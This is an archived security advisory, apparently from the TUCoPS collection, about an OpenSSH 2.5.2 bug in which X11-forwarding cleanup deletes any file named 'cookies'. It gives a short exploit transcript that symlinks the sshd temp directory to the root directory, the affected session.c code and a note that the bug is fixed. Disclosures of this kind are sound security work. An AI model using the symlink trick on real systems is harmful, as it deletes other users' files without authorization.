TUCoPS :: Linux :: Apps N-Z
:: openss~1.htm
OpenSSH - delete cookies file
Vulnerability
OpenSSH
Affected
OpenSSH
Description
'zen-parse' found following. You can delete any file on the
filesystem you want... as long as its called cookies. Not really
a very useful bug, but could cause annoyances to people who
actually like their cookies.
Sample exploit:
[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
Tested on Red Hat Linux release 7.0 (Guinness):
[zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
openssh-server-2.5.2p2-1.7.2
[zen-parse@clarity zen-parse]$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f
The configuration file has not been modified from the default
settings. Although sshd does drop root privileges, the processes
groups are not cleared. (From /proc/$$/status of the sshd handling
the session, and the output of strace and ltrace. (no use of
initgroups in the ltrace output of the process that creates the
directory, although it does do change euid before hand. there no
setgroups in the strace output.)
The file itself is created with O_EXCL so a symlink in place of
the file cannot be used to create/overwrite arbitrary files.
This vulnerability works fine on both RedHat 7.1 & 7.0 with the
latest updated packages from RedHat installed.
Jerry Connolly tested it on OpenSSH_2.5.2 on OpenBSD and it
worked. He had to enable X forwarding on the client and server
before the remote machine would create (and attempt to unlink() )
the cookies file. The offending code is in session.c in the
xauthfile_cleanup_proc() function
<SNIP>
/*
* Remove local Xauthority file.
*/
void
xauthfile_cleanup_proc(void *ignore)
{
debug("xauthfile_cleanup_proc called");
if (xauthfile != NULL) {
char *p;
unlink(xauthfile);
</SNIP>
where xauthfile points to a buffer containing the name of the
cookies file.
Solution
Fixed in openssh's cvs (see www.openssh.com).